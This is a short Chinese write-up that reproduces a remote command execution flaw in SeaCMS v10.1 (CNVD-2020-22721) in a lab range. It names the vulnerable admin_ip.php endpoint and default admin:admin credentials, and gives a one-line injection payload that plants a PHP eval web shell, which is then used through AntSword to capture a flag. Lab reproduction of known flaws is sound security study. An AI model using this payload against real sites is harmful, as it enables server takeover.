SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)
漏洞信息
- seacms_v10.1有效
- cnvd-2020-22721
- 命令执行漏洞
描述
海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin
前提
-
volfucs靶场复现
-
可以进入后台
复现过程
登录进入首页
按照如图顺序访问,点击确认时抓包
修改内容
v=0&ip=127.0.0.1";eval($_POST[999]);//
网页回显正常没有报错
尝试蚁剑连接
ip安全设置选项位置为admin_ip.php
访问也正常
尝试蚁剑连接该位置
成功获取flag文章来源:https://www.toymoban.com/news/detail-718483.html
文章来源地址https://www.toymoban.com/news/detail-718483.html
到了这里,关于漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!